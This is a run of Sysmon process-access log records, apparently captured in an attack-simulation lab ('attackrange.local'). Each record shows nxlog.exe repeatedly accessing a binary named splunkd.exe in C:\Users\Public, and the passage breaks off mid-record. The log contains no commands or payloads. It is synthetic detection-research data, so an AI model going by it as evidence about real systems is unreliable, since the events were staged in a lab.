{"EventTime":"2020-08-01 06:58:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6622,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:10.549\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:10.549","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6623,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:11.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:11.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:12","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6624,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:12.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:12.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:13","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6625,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:13.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:13.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6626,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:14.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:14.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6627,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:15.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:58:15.550","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:58:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:58:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6628,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:58:16.550\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 